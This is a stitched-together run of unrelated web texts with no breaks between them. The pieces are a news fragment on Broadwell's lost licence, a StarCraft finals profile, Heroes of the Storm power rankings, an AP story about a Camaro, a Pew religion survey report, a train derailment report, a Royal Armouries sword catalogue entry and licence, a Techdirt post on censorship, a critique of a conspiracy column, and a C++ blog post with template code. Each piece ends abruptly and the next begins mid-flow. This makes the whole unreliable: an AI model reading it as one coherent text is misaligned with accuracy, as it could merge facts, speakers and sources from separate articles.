Park Police officials alerted officials at the FBI, who are investigating Broadwell in a probe that led the former top spy official to resign last week. The police intend to keep the license for 90 days unless Broadwell claims it, Kellogg said.
News of the misplaced license was first reported by US News and World Report.
There was a time in StarCraft: Brood War when all the strategic intricacies of the game still were shrouded in darkness. It was a time when professional play was as much festive cooperation as it was cutthroat competition. StarCraft was a communal riddle; televised tournaments were where our shrewdest would flaunt their latest leads. With every breakthrough, we would clap and cheer in awe, just like children on Christmas morning. Editor's Picks Meet the most exciting player in Overwatch He might not be the best player, but 18-year-old Kim "Libero" Kim Hye-sung is quickly becoming the most valuable member of Metha Athena by making everyone around him better.
LoL: Samsung dominant in sweep of SKT In a rematch of the 2016 World Championship Finals, Samsung Galaxy put forth a commanding performance en route to a 2-0 series victory over SK Telecom T1.
There's no slowing down for OG's ana Once upon a time, OG's mid laner was just another player in an Australian gaming pub. When he made the decision to move to China in 2015 to pursue professional Dota 2, he had no idea where his journey would take him. 2 Related
Lee "Shine" Young-han's revolutionary creativity takes us back to those days of yore. Due to much of his gameplay revolving around mind games and trickery, his style is labeled by some as evil, by others as cheap. But at the core of his approach lies a pure, boyish wonder for the infinite possibilities that the game's canvas provides -- a spark of joy that most of us, perhaps, lost too long ago.
Brood War fans around the world were collectively shocked last Saturday when Shine took out the greatest Protoss of all time -- Kim "Bisu" Taek-yong -- in the Afreeca Starleague Season 3 semifinals. Busting out a series of bygone builds in brilliantly premeditated order, Shine managed to topple Bisu and reach a Starleague finals for the first time in his career. His opponent? The legendary Lee "Flash" Young-ho.
The Typhoon Zerg
Violent atmospheric disturbances have always been associated with Zerg players. The tradition started when the race's first legend, Hong "YellOw" Jin-ho, was christened "Storm Zerg" for his trademark scrappy, turbulent aggression. Shine shares many stylistic traits with YellOw, though his game features an additional nuance.
"One word is enough to describe my style of play: typhoon." Shine
"Usually when we speak of Zerg aggression, hungriness is implied," Shine said. "But mine often incorporates an early investment into economy that will set me up to overwhelm through sheer numbers at a specific point [in the future]."
It's fitting. A storm is a number 10 on the Beaufort wind force scale. A typhoon is 12.
Shine's approach to the game is a part of why he was so successful with ZvZ and ZvPs during his KeSPA career; history proves that aggressive players, who are more than happy to pull the trigger on timing rushes and cheesy all-ins, tend to do much better in those match-ups. Such is not the case for ZvT, however. There is no chronically favored approach. The list of top ZvT players consists of as many offensive ones (Lee "Jaedong" Jae-dong, Kim "EffOrt" Jung-woo, and YellOw) as defensive (Kim "SoulKey" Min-chul, Park "GoRush" Tae-min, and Shin "RorO" No-Yeol), with no bias toward either end.
ZvT has always been Shine's main weakness. Although he defeated Yoon "Mong" Chan-hee in this season's quarterfinals, many fans are still convinced that it remains his Achilles' heel. He views the finals as an opportunity to put an end to such doubt.
"What better stage than the grand finals, and what better opponent than the Ultimate Weapon, to prove my ZvT once and for all?"
The Ultimate Weapon
Legendary pro gamer Lee "Flash" Young-ho started playing professional StarCraft: Brood War in South Korea at 14 years old. His fans call him "The Ultimate Weapon." Helena Kristiansson/ESL
Flash has a ruthless history of putting an end to Cinderella runs; past victims include Kim "Zero" Myung-woon (2011 ABC Mart MSL finals) and Jin "Movie" Young-hwa (2009 EVER Starleague finals). Universally considered the best player to have ever played Brood War, Flash has carried over his KeSPA-era preeminence in full to the Afreecan continent. Since finding his stride in Season 2, his ASL record stands at a whopping 21W-6L (77.8% WR).
A huge part of why Flash is the greatest player of all time is his game sense -- gam, he calls it -- that lets him sniff out his opponents' intentions with the tiniest slivers of information. It was what allowed him to land the miraculous Scanner Sweep in Game 5 against SoulKey, a move that single-handedly won him the semifinals.
"Guardians were completely [outside of] my calculations; I probably would have lost if I had not discovered the [Cocoons]," he said. "I just threw out the [Scanner Sweep] because [SoulKey] had produced a few more Mutalisks after the first batch, and that confused me." It smacks of omniscience. Most other players would not even have been confused, let alone correctly surmising in one go the exact location of SoulKey's ace in the hole.
"[Shine] is doing very well right now, but I always play with full faith in my skill. Whatever he comes prepared with, I'll win." Flash
How Shine could hope to stop Flash, when even SoulKey could not, is a difficult question to answer. To be clear, this is due to how the two players' styles match up against Flash's, not Shine being the worse ZvT player overall (though this is true as well).
Flash declared as much himself: "[Shine]'s style completely differs from [SoulKey]'s. [Shine] is slanted heavily towards strategy. I'm good at defending against those [kinds of plays], so I feel confident about the finals."
The Bag of Builds
"I have a number of ZvT builds from my [KeSPA] days -- those I decided not to use on other Terran players -- because I wanted to use them against [Flash]," Shine pointed out.
Brood War is to an extent cyclical, and no player has been better at resurrecting forgotten builds from the past than Shine. In Games 2, 3 and 4 of his semifinals against Bisu, Shine busted out tactics from 2010, 2005 and 1999, respectively, to snatch a 3-1 victory.
Flash is undoubtedly the most impregnable player to have ever played the game, but if anyone could unearth a dusty old tactic obscure enough to bypass his game, it would be Shine. It has been said by both himself and his colleagues that he is aware of every single Zerg build in history, and surely somewhere within the twenty-year annals of Brood War will lie at least one such trump card. The real problem is that he has to find at least four.
With not much time left until next Sunday, Shine has made the unprecedented move of calling for build suggestions from amateurs; his email address is up on his Afreeca channel. The logic is that even if those builds in their submitted forms are unrealistic, he might be able to edit the more outlandish-but-promising ideas up to tournament viability.
Some skeptics have responded to the announcement with scorn, questioning if Shine has even a single secret prepared. In response to such doubts, Shine revealed that while he might not have in hand an entire host of decade-old surprises, he does have "one -- exactly one -- that's a guaranteed win."
Its reveal should be one of the most exciting moments of the grand finals.
The Second Coming
Brood War being played at the Afreeca studios in Seoul, South Korea. ESPN
"How I feel about my play right now reminds me of 2010," Flash said.
2010 was the year of deification: Flash made it to the finals of every single Starleague held (winning four out of the six) that season, while also carrying KT Rolster single-handedly to the organization's first Proleague championship. No other Brood War player had ever shown such categorical dominance over such an extended period of time. The community was swift to conclude that no word apart from "God" would be sufficiently panegyrical.
From a purely mechanical standpoint, it could be easily argued that Flash's current form fades in comparison to his of 2010. But physical dexterity is only half of what the highest level of StarCraft consists of. Mentally speaking, he might have become even tougher.
"I'd be lying if I said that I'm entirely free of the pressure that comes from being [the one] with everything to lose," Flash mused, "but I'm dealing with it very well. I guess part of it is because I've recently returned to a level of play that is satisfactory for me, [but it's also] because I've become more mature over the years."
It would be misleading to argue that all of Shine's strengths as a player come from his liberal use of smokes and mirrors, but it is true that he has always benefited from his opponents' second-guessing themselves by virtue of his reputation. A self-confident Flash, however, will be virtually immune to such passive intimidation. If Shine fails to account for it properly, the finals might be even more one-sided than expected.
The Single Father
Shine, 25, is a father of two young boys. Yet to enter grade school, both were occasionally seen in the background of his streams. After he made it through to this season's round of 16, he promised on air that he would "be going home to the boys with hands full of chicken." Hearts melted around the nation. Fans affectionately called him the "Dad Zerg."
Less than two weeks later, he and his wife separated due to undisclosed personal reasons.
For a while, the children stayed with Shine. They waddled into the stream more often, as their mother could no longer keep them occupied elsewhere in the house. Sometimes they would yell out loud for their mother, asking her what she was doing, while Shine streamed.
As Shine advanced further in the tournament, he needed more and more time for practice. It was decided that the kids would need to stay with their mom for a while. Now his streams are silent save for his voice, some music and the sounds of the game.
"Both the hardest event of my life and the happiest event of my life occurred this season," Shine said, "so I really want to end it with a championship."
His voice was calm, stoic, but trembling.
"For me, StarCraft was my one beam of hope," he recalled. "The moments when I could simply focus on the game ... they brought me immeasurable joy during my toughest times."
The very night of his semifinals victory, he logged on for an outdoors stream to unwind and celebrate with his fans. An hour and half into the broadcast, a viewer mentioned his boys.
"I should bring Ju-wan and Ju-young to the finals. They should get to see me on stage."
Shine smiled with misty eyes.
"My Ju-wan and Ju-young," he repeated.
---
The typhoon approaches flash point. The ASL Season 3 finals will take place Sunday at 6 p.m. Korea Standard Time / 5 a.m. Eastern Time at the Seoul Children's Grand Park Outdoor Concert Hall.
This week, 16 teams are preparing to take Anaheim by storm as the HGC Finals are finally upon us! In anticipation for Opening Week, we've put together power ranking for the 16 teams competing for BlizzCon. A variety of factors went into the rankings:
First matchup during BlizzCon opening week
Previous results in international tournaments
Previous experience in international tournaments
Phase 2 results
Outside issues (hot streaks, synergy, roster problems due to visas)
Before we begin, I'd like to extend a huge thank you to Argy, Romo and Temisis for providing additional notes and feedback.
#16 – RED Canids
Facing a mountain of obstacles, RED Canids are fairly hard to bet on for the HGC Finals. Hailing from Latin America, they weren't able to win a map during the Mid-Season Brawl or the Phase 2 Western Clash. Additionally, RED Canids will be playing with 2 subs as their drafter and shotcaller Typhex as well as Assassin player Lethocerus ran into VISA issues leading up to BlizzCon. To top it all off, they landed in Group C, the so-called “group of death” with Team Dignitas, Tempest and Roll20 Esports.
#15 – Deadlykittens
The SEA region hasn't left it's mark at an international competition yet, and Deadlykittens faces a massive first hurdle on opening day of HGC Finals by facing off against the titans of MVP Black. With a likely loss against MVP Black, Deadlykittens will need to win out over both CE and Tempo Storm. While they did take a map off of CE during the Phase 2 Eastern Clash as well as Super Perfect Team during the Mid-Season Brawl, Deadlykittens hasn't fared well against Western teams. Finally, they lost two players to Soul Torturers following the Eastern Clash, which leaves far too many question marks for this SEA team.
#14 – Beyond the Game
Newcomers to international play, Beyond the Game emerged as the third seed from China to qualify for HGC Finals. The major issue they face for their first international tournament is a significantly substituted roster, as 3 of their members were unable to obtain visas to compete at BlizzCon. Their first matchup is a tough one against Team Freedom, who saw some success during the Phase 2 Western Clash. The sheer difficulty in preparing to face Beyond the Game's reworked roster could lead to an upset, but it's a long shot.
#13 – Dark Sided
Defeating the long-time ANZ representatives Nomia allowed Dark Sided to qualify for HGC Finals this year. In the past, Nomia has been able to put up a fight at the international level, defeating Super Perfect Team and taking maps off of Team Liquid as well as Roll20 Esports. That experience will be helpful as robadobah left Nomia to join Dark Sided. Unfortunately, Dark Sided faces the Fnatic in the opening matchup for Group B, which puts them at quite the disadvantage for making it out of the Group Stage.
#12 – Soul Torturers
This Taiwanese team is known for upsets in the past, making them hard to place in terms of predictions. They gained two members from Deadlykittens, but will need to conquer some tough competition in their first matchup against Super Perfect Team.
#11 – CE
The #2 seed from China will need to move past MVP Black, Tempo Storm and Deadlykittens to advance past Group Play. While they are missing a major Assassin player xuyu due to visa issues, Challenge Everything has been able to take maps off of MVP Black and Tempest in the past. We'll have a much clearer picture of their potential with a substitute when they face Tempo Storm for the 2nd match of Opening Week.
#10 – Team Expert
Team Expert has seen a lot of growth with the addition of Atheroangel, qualifying to the HGC Finals as the #3 seed from Europe. They went 8-6 in Phase 2, with a 32-22 game record. In preparation for BlizzCon they bootcamped in Korea, which will likely be a very helpful boost as they will need to escape Group Play out of an unpredictable Group D that includes Super Perfect Team, Soul Torturers and Ballistix.
#9 – Tempo Storm
Phase 2 was a rocky time for Tempo Storm, the #3 seed qualifying from North America. With some experimentation on role swaps in the 2nd half of Phase 2, Tempo Storm looked out of sorts at times. They went 7-7 in Phase 2, with a 31-26 game record, nearly losing to Lag Force at the end of League Play. The team bootcamped in preparation for the HGC Playoffs and the results were instantly clear. They finished off SpaceStation Gaming and Gale Force Esports with a fire and passion we haven't seen from the team in awhile. Additionally, this is the longest-standing roster in North America and their second year as a full team at BlizzCon (they competed under Astral Authority in 2016). While they haven't had the best luck in international competitions, their roster consistency and recent fire makes their opening match against CE a very intriguing one.
#8 – Team Freedom
Team Freedom rapidly ascended in North America during Phase 2 to qualify them as the #2 seed from the region. They boast a 12-2 match record in League Play during Phase 2 with a 38-14 game record. This will be their second major competition for the year, they won against Nomia at the Western Clash and took Team Liquid to 5 games before being knocked out. We'll likely see how they compare to Fnatic as their first matchup in Group B is against the deeply substituted Beyond the Game.
#7 – Roll20 Esports
Roll20 Esports finds themselves in an awfully tense situation during Opening Week of HGC Finals. The #1 seed from North America was placed into the “group of death” alongside Team Dignitas, Tempest and RED Canids. Although they missed the Phase 2 Western Clash, Roll20 Esports gained a lot of international experience in both the Phase 1 Western Clash and the Mid-Season Brawl. They have won over Nomia, Super Perfect Team and Deadlykittens, and taken maps off of Team Dignitas and MVP Black. They have a chance of making it out of Group Play but a lot will revolve around securing high impact heroes for Glaurung and Justing.
#6 – Super Perfect Team
Super Perfect Team emerged as the #1 seed from China due to their 48-8 record in Phase 2. The team is often plagued with visa issues when competing at international events, but it seems like they have become quite flexible due to their ever shifting roster. The Support player “sa” will be filling in at HGC FInals, where they will face off against Soul Torturers to kick off the tournament.
#5 – Tempest
The #3 seed from Korea is back at their first international tournament since the Summer Global Championship in 2016, where they shocked MVP Black to take home 1st place. Tempest was 11-4 in Phase 2 with a 36-18 game record. Although they were placed in the tough Group C, Tempest has a good chance of making it past Team Dignitas, RED Canids and Roll20 Esports behind the continued synergy of brothers Hide and Lockdown.
#4 – Team Dignitas
The #2 seed from Europe has had their share of ups and downs in 2017, but are looking to end the year on a high note at HGC Finals. They started the year by defeating Fnatic to claim 1st place at the Phase 1 Western Clash. At the Mid-Season Brawl they gained an extensive portfolio of international victories against Soul Torturers, MVP Black and L5, only to lose in the Grand Finals against Fnatic. Team Dignitas wasn't able to make it to the Phase 2 Western Clash, but their time bootcamping in Korea prior to BlizzCon will be essential as they attempt to escape the dreaded “group of death” against Roll20 Esports, RED Canids and Tempest. With their experience and level heads at a LAN, Team Dignitas should make it out in one piece.
#3 – Ballistix (L5)
Qualifying as the #2 seed from Korea, Ballistix (formerly L5) will be attempting to defend their 2016 Fall Global Championship title. Although they were knocked out of the Mid-Season Brawl by Team Dignitas, Ballistix took 2nd at the Phase 1 Eastern Clash behind MVP Black. Ballistix returned the favor during the Phase 2 Eastern Clash winning over MVP Black 4-1. This team is on a mission to re-establish Korean dominance in Heroes of the Storm and will make waves once the competition begins.
#2 – MVP Black
The 2017 version of MVP Black isn't as dominant as they were in 2016, but they are absolutely a major contender for HGC Finals. After winning the Phase 1 Eastern Clash, they were not only knocked out of the Mid-Season Brawl in a close match with Ballistix, but also lost their captain with merryday retiring. Filling the void, Rich joined for Phase 2 where MVP Black went 14-0 in League Play, and held onto an impressive 42-6 game record. They did lose to L5 at the most recent Eastern Clash, so expect MVP Black arrive in Anaheim with a vengeance.
#1 – Fnatic
Walking away with 1st place at the Mid-Season Brawl wasn't enough for Fnatic, the #1 seed from Europe. They also won the Phase 2 Western Clash without dropping a single map, which was an incredible feat. Add to that their 13-1 record in Phase 2 League Play and their 40-8 game record for Phase 2, Fnatic has become a well-oiled machine for Heroes of the Storm domination. They've set their sights on 1st place for HGC Finals and are the team to beat – but will certainly be challenged by MVP Black and Ballistix out of Korea.
—
HGC Finals Opening Week begins on Thursday October 26th at 11 a.m. PDT. All of the action can be seen on the Heroes of the Storm Twitch page.
Enlarge Papa John's Jeff Robinson of Flatwoods, Ky., left, received a $250,000 prize for helping reunite Papa John's Pizza founder John Schnatter with his beloved 1971 Z28 Camaro. LOUISVILLE (AP)  The founder of the Papa John 's pizza chain has finally reunited with the muscle car he sold years ago to help keep his family's business afloat. John Schnatter sold the gold-and-black 1971 Chevrolet Camaro Z28 for $2,800 in 1983. The money helped save his father's tavern in Jeffersonville, Ind., and he used the rest to start what would become a worldwide pizza business. But he still missed his beloved Camaro and spent years searching for it. He created a website on the search, held promotional appearances and eventually offered $250,000 to whoever found it. It turns out he didn't have to leave Kentucky, where the pizza chain is based in Louisville. The car only changed hands twice from the original buyers, ending up with Jeffery Robinson in Flatwoods, about 165 miles to the east. "When I first saw it I still wanted to look it over to make sure it was the car even though I knew it," Schnatter told The Associated Press. "That kind of hit me emotionally. I was kind of numb." The original buyers of Schnatter's car heard about the search when he appeared in a TV interview before an NFL game this month. An online search led them to the car blog Jalopnik, which has followed the search and tipped off Papa John's. Robinson, who bought the car about five years ago for $4,000, recently delivered the Camaro to Schnatter, earning the $250,000 reward. The original buyers will get $25,000 for their help tracking it down. Schnatter says it looks very much the same as it did when he sold it in 1983, but with a larger motor and fatter tires for drag racing. The car will be displayed at the company headquarters in Louisville, replacing a replica Schnatter commissioned while he searched for his original car. In honor of the reunion, Papa John's planned to offer all Camaro owners a free pizza at stores on Wednesday. Papa's Road Trip: http://www.papasroadtrip.com/ Jalopnik: http://jalopnik.com/ Copyright 2009 The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed. Guidelines: You share in the USA TODAY community, so please keep your comments smart and civil. Don't attack other readers personally, and keep your language decent. Use the "Report Abuse" button to make a difference. You share in the USA TODAY community, so please keep your comments smart and civil. Don't attack other readers personally, and keep your language decent. Use the "Report Abuse" button to make a difference. Read more
The largest single religious group in the Democratic Party is now the religiously unaffiliated, or “nones,” a new report by the Pew Research Center reveals.
In just seven years, the percentage of religiously unaffiliated among Democrats jumped a remarkable 47 percent, from 19 percent in 2007 to 28 percent in 2014.
The category of “religiously unaffiliated” comprises those who self-identify as atheists or agnostics as well as those who describe their religion as “nothing in particular.” According to the study, the religiously unaffiliated now account for 23 percent of the total U.S. adult population, up from 16 percent in 2007.
For the first time on record, fewer than two-thirds of Democrats and “Democratic-leaning” adults now identify with any branch of Christianity, the study found, down 11 percentage points since 2007. The decline in the number of Christians among Democrats was the single largest drop among the groups evaluated in the study.
In 2007, Catholics made up the largest single religious group in the Democratic Party, with 24 percent of the total. With a decrease to 21 percent, Catholics have now been superseded by the unaffiliated as the leading religious contingent among Democrats.
Nearly three-in-ten Democrats now say they have no religion whatsoever, up 9 points since Pew's last Religious Landscape Study.
In contrast, Evangelicals make up by far the largest religious group among Republicans, with 38 percent of the total, a modest gain from the 37 percent in 2007. Catholics, on the other hand, historically affiliated with the Democratic Party, now are equally represented between the two parties, at 21% of both the Democratic and the Republican Party.
More than 80 percent of Republicans continue to identify themselves as Christians, spread predominantly among Evangelicals, Catholics and mainline Protestants.
Results come from the massive 2014 U.S. Religious Landscape Study, comprising a nationally representative telephone survey of 35,071 U.S. adults.
Follow Thomas D. Williams on Twitter @tdwilliamsrome
Image copyright Samuel Williams Image caption The train had been heading for Penzance in Cornwall
Passengers had to be evacuated from a train after it derailed while leaving Paddington station in London.
The rear power car of the Great Western Railway train partially left the track as it departed for Penzance in Cornwall shortly before midday.
A spokesperson for the rail firm said it was "travelling at extremely low speed" and no injuries were reported.
Platforms one and two are currently out of use while Network Rail investigates what happened.
The passengers on board were transferred to another service and other trains leaving the station are running to their original timetables.
Image caption A train at Waterloo crashed into wagons that were in place for station upgrade works
It is the second time a train has derailed at a major London station in a week.
On Tuesday, a South West train left tracks after it hit a barrier train at Waterloo station causing major disruption for commuters.
On the same day, a Great Northern train crashed into buffers as it arrived at King's Cross.
J. Hewitt, Official catalogue of the Tower Armouries, London, 1870, No. Ad.303, p.9.
Dimensions: length: overall 171 cms (67.25 in), length: of blade 89.5 cms (35.25 in), Diameter of grip 5 cms, Width of back of blade 2 cms, Weight: 30.42 kg (67 lb)
The blade is curved with a single edge widening to a broad point. The tip is double edged for approximately one third of the length of the blade. It is separated from the rest of the back by a shallow elongated cut out. The blade is separated from the guard by a thick, rectangular silvered collar forged at one with the blade. The guard is composed of a solid metal disc with a medial ridge on the edge and is also silvered. A silvered cone-shaped collar with concave flanks extends back immediately behind the guard. The grip is tubular and retains a portion of the black leather cover in the centre of the grip. This is embossed with foliate designs in a repeating tessalated pattern. The design incorporates a five petalled flower at the centre surrounded by four scrolling leaves and finished afterwards with a background of hatching. The patterns are superimposed on one another in places. The grip terminates in a shaped collar surmounted by a heavy, globular pommel. Both are silvered. The scabbard is damaged. It is made of broad wooden panels covered in a frayed brown fabric with a plaited braid band wrapped around the scabbard near the top. The chape is made out of a thin sheet of copper alloy and decorated on the flat of the blade with a central design composed of a pierced star within a ring on top of a cusped point with scalloped edges.
Non-Commercial Licence (and Crown Copyright Licence)
Scope
You are encouraged to Use:
Content in which Royal Armouries owns the IPR; and
Our Crown Copyright Content
upon the following Terms and Conditions and when you make any Non-Commercial Use of Our Content, or make any Use of Our Crown Copyright, which is not otherwise permitted by law You will be deemed to have accepted these Terms and Conditions by Your conduct.
If You do not accept these Terms and Conditions please refrain from making any Non-Commercial Use of Our Content or any Use of Our Crown Copyright Content, which is not otherwise permitted by law.
These Terms and Conditions incorporate the definitions and other provisions set out in the main body of this Royal Armouries Website and Copyright Use Statement.
Your Non-Commercial Use Licence in respect of Our Content
Royal Armouries grants you a worldwide, royalty-free, non-exclusive licence to make Non-Commercial Use only of the Content in which Royal Armouries owns the IPR subject to the conditions below. The Royal Armouries reserves the right to terminate this licence upon reasonable notice.
For the avoidance of doubt, where the Royal Armouries owns the IPR in any Content You are not permitted to exercise any of the rights granted to You by this licence in any manner that is primarily intended for or directed toward commercial advantage or private monetary compensation or gain.
Your Licence to Use Our Crown Copyright Content
Royal Armouries grants you a worldwide, royalty-free, non-exclusive licence to make Commercial Use or Non-Commercial Use of Our Crown Copyright Content subject to the conditions below. The Royal Armouries reserves the right to terminate this licence upon reasonable notice.
The rest of this licence applies to your Non Commercial Use of Our Content and all use of Our Crown Copyright Content.
You must not do anything which is prohibited under the section of this document entitled "Restrictions on Your Use of Content".
You must , where You make any Non-Commercial Use of the Content or any Use of Our Crown Copyright Content:
acknowledge the source of the Content by including an Attribution provided that if you are using Content from several rights owners and sources and therefore listing multiple attributions is not practical in your product or application, you may include a URL or hyperlink to a resource that contains the required attribution statements
ensure that where Content is Used the source of the Content is also identified alongside the Attribution, e.g. ‘Title, Artist, Date of Work, Photo'
ensure that any onward licensing of the Content - for example where You permit Your work which includes reference to Our Content or Our Crown Copyright Content alongside other Content to be Used by Third Parties - is also subject to these terms
These are important conditions of this licence and if You fail to comply with them or make Commercial Use of Our Content without Our prior written consent the rights granted to you under this licence will terminate automatically.
Exemptions
This licence to make Non-Commercial Use of Our Content and/or Commercial Use and Non Commercial use of Our Crown Copyright Content along with Our licence to make Commercial Use of Our Content does/will not cover the Use of:
any personal data within the Content
any information that has neither been published nor disclosed to You under information access legislation (including the FOI Regime) by or with the consent of the Royal Armouries
departmental or public sector organisation logos, crests, military insignia and the Royal Arms except where they form an integral part of a document or dataset within Our Content
Third Party IPR (other than Our Crown Copyright Content) which the Royal Armouries is not authorised to license
identity documents such as the British Passport.
No warranty
The Content is licensed ‘as is' and the Royal Armouries excludes all representations, warranties, obligations and liabilities in relation to the Content to the maximum extent permitted by law.
The Royal Armouries is not liable for any errors or omissions in the Content (including errors or omissions resulting from Our negligence) and shall not be liable for any loss, injury or damage of any kind caused by its Use. The Royal Armouries does not guarantee the continued supply of Content.
Governing Law
This licence is governed by the laws of the jurisdiction of England & Wales.
About this Licence
The Royal Armouries has adapted this licence from the Non-Commercial Government Licence developed by the Controller of Her Majesty's Stationary Office. The Controller may, from time to time, issue new versions of the Non-Commercial Government Licence. However, You may continue to Use Content licensed under this version should you wish to do so.
Further context, best practice and guidance can be found in the UK Government Licensing Framework section on The National Archives Website
Saudi Religious Police: Anyone Uses Twitter 'Has Lost This World And His Afterlife'
from the that-serious,-huh? dept
Individuals are silenced on daily basis, and the pool of sensitive words grows by the hour: Liu Xiaobo, Gao Xingjian, Ai Weiwei, Wei Jingsheng, Liao Yiwu, Ma Jian, Mo Zhixu, Xiao Shu … The list goes on. It now includes me, as well as two more scholars who have since been silenced: Wu Wei and Wu Zuolai, whose accounts were deleted on the morning of 13 May. Lurking in the shadows, the "relevant organs" carry out such work as part of their daily routine, and expect people to remain silent. They have perhaps failed to foresee that in the age of Weibo, their actions could trigger such a severe backlash. To this, they responded with more censorship.
The head of Saudi Arabia's religious police has warned citizens against using Twitter, which is rising in popularity among Saudis.
Sheikh Abdul Latif Abdul Aziz al-Sheikh said anyone using social media sites -- and especially Twitter -- "has lost this world and his afterlife".
Many Saudis have seized on Twitter as the most immediate and effective way to open little windows into a traditionally opaque society.
Recent protests in the Eastern Province have been tweeted and images of human rights activists on trial have been uploaded directly from courtrooms, challenging many taboos.
Dear Saudi Telecommunication Authority, social media is a tool for the people to make the government hear their voices. Just thinking of blocking them is a losing war, and a way to put more pressure on the citizens
A couple of days ago Techdirt wrote about how Murong Xuecun, a well-known user of the Chinese microblog Sina Weibo with over a million followers, had his account closed down suddenly. Murong has now written a fine article about the background to what happened : he points out that the deletion of his account looks to be part of a larger clampdown on the use of microblogging services by well-known figures who are critical of the Chinese government. The problem for the latter is that these services are becoming a real channel for free expression and less-than-perfectly-censored information:Given the problems that even China is having with controlling such services, it's no surprise that other nations are getting nervous. Here's a story from the BBC about what Saudi Arabia is doing in an attempt to counter the threat from Twitter The Saudi authorities are evidently grappling with exactly the same issues as the Chinese government:The situation in Saudi Arabia is complicated by the fact that the well-known Saudi Prince Alwaleed bin Talal bought a $300 million stake in Twitter back in 2011. That doubtlessly explains in part the following comments he made recently using his own Twitter account , quoted in an article from CNN:As Twitter continues to gain market share -- already standing at a massive 51% of all Internet users in Saudi Arabia according to the CNN piece -- it will be interesting to see whose view prevails there: that of the religious police or a secular prince.
Follow me @glynmoody on Twitter or identi.ca, and on Google+
Filed Under: free speech, saudi arabia, social networking
Companies: twitter
In his WorldNetDaily column today, Erik Rush claims that President Obama likely “orchestrated the attack” on the compound in Benghazi “given his connections to the Muslim Brotherhood and legendary understanding of all things Islamic.” He offers no evidence as to why or how Obama “arranged for the assault on the compound,” but that's par for the course at WorldNetDaily.
Rush cites the “Trinity United murders,” which according to far-right lore was Obama's move to murder his former gay lovers he attended church with, as proof of Obama's record of “grave criminal action.”
“Depending on the outcome, measures might be as severe as charges filed against Cabinet officials or the impeachment of Obama himself,” Rush writes. “While this president reasonably deserves to be occupying a cell in some federal penitentiary anyway, impeachment presents many troublesome aspects.”
But he warns that impeachment proceedings against Obama will “ignite civil unrest,” which Rush claims is actually Obama's plan all along!
I like the pimpl idiom because I like to keep my headers as clean as possible, and other people's headers are dirty. Unfortunately the pimpl idiom never feels like a good solution because it has runtime overhead that wouldn't be needed if I didn't care about clean headers so much.
If you're not familiar with the Pimpl idiom, it stands for “pointer to implementation” and you use it in C/C++ headers to use a class without having to include the other header in your header. You can also use it to hide your implementation from your users so that you can change the internals of your class and nobody has to know. It's used all over the place but it has one disadvantage: You always need an extra heap allocation and every method performs an extra pointer dereference.
This code fixes that, so that there can be zero runtime overhead. Here's how to use it:
class btRigidBody; class MyRigidBody { // ... ForwardDeclaredStorage<btRigidBody, 768> bulletBody; };
And the code is below:
#pragma once #include <utility> namespace detail { template<size_t ExpectedSize, size_t ActualSize, size_t ExpectedAlignment, size_t ActualAlignment> inline void compare_size() { static_assert(ExpectedSize == ActualSize, "The size for the ForwardDeclaredStrage is wrong"); static_assert(ExpectedAlignment == ActualAlignment, "The alignment for the ForwardDeclaredStrage is wrong"); } template<size_t ExpectedSize, size_t ActualSize, size_t ExpectedAlignment, size_t ActualAlignment> struct size_comparer { inline size_comparer() { // going through one additional layer to get good error messages // if I put to assert down one more template layer, gcc will show the // sizes in the error message compare_size<ExpectedSize, ActualSize, ExpectedAlignment, ActualAlignment>(); } }; } struct forwarding_constructor {}; template<typename T, size_t Size, size_t Alignment = 16> struct ForwardDeclaredStorage { ForwardDeclaredStorage() { new (&Get()) T(); } template<typename... Args> ForwardDeclaredStorage(forwarding_constructor, Args &&... args) { new (&Get()) T(std::forward<Args>(args)...); } ForwardDeclaredStorage(const ForwardDeclaredStorage & other) { new (&Get()) T(other.Get()); } ForwardDeclaredStorage(const T & other) { new (&Get()) T(other); } ForwardDeclaredStorage(ForwardDeclaredStorage && other) { new (&Get()) T(std::move(other.Get())); } ForwardDeclaredStorage(T && other) { new (&Get()) T(std::move(other)); } ForwardDeclaredStorage & operator=(const ForwardDeclaredStorage & other) { Get() = other.Get(); return *this; } ForwardDeclaredStorage & operator=(const T & other) { Get() = other; return *this; } ForwardDeclaredStorage & operator=(ForwardDeclaredStorage && other) { Get() = std::move(other.Get()); return *this; } ForwardDeclaredStorage & operator=(T && other) { Get() = std::move(other); return *this; } ~ForwardDeclaredStorage() { detail::size_comparer<Size, sizeof(T), Alignment, alignof(T)> compare_size{}; Get().~T(); } T & Get() { return reinterpret_cast<T &>(*this); } const T & Get() const { return reinterpret_cast<const T &>(*this); } private: __attribute__((aligned(Alignment))) unsigned char storage[Size]; };
This uses a well-known hack where you put the necessary storage into your class, and then placement-new the forward declared object into the storage. But the benefit of this template is that it's all type-safe and the default copy/move constructor, destructor and assignment operators all do the right thing.
I use the forwarding_constructor struct as a required argument for the forwarding constructor, because constructors with perfect forwarding can otherwise mess up overload resolution. You use it like this:
ForwardDeclaredStorage<widget> a(forwarding_constructor{}, args, for, widget);
The downside of the ForwardDeclaredStorage compared to regular pimpl is that you have to keep the size given in the template in sync with the struct that you're forward-declaring. So a change in the implementation can still cause a recompilation of all users. In my case that doesn't matter because I use this to hide the libraries that I'm using, and the size of their structs only change when I update the library version. And there's a static_assert there to prevent me from getting the size or the alignment wrong. (Funny thing: I only added to assert for alignment because I felt bad about publishing this when I was only checking the size. Turns out that the code example from the beginning of the post is actually incorrect, because the btRigidBody class is 64 bytes aligned for reasons unknown and unenforced)
The license for this code is this:
This is free and unencumbered software released into the public domain. Anyone is free to copy, modify, publish, use, compile, sell, or distribute this software, either in source code form or as a compiled binary, for any purpose, commercial or non-commercial, and by any means. In jurisdictions that recognize copyright laws, the author or authors of this software dedicate any and all copyright interest in the software to the public domain. We make this dedication for the benefit of the public at large and to the detriment of our heirs and successors. We intend this dedication to be an overt act of relinquishment in perpetuity of all present and future rights to this software under copyright law. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. For more information, please refer to <http://unlicense.org/>
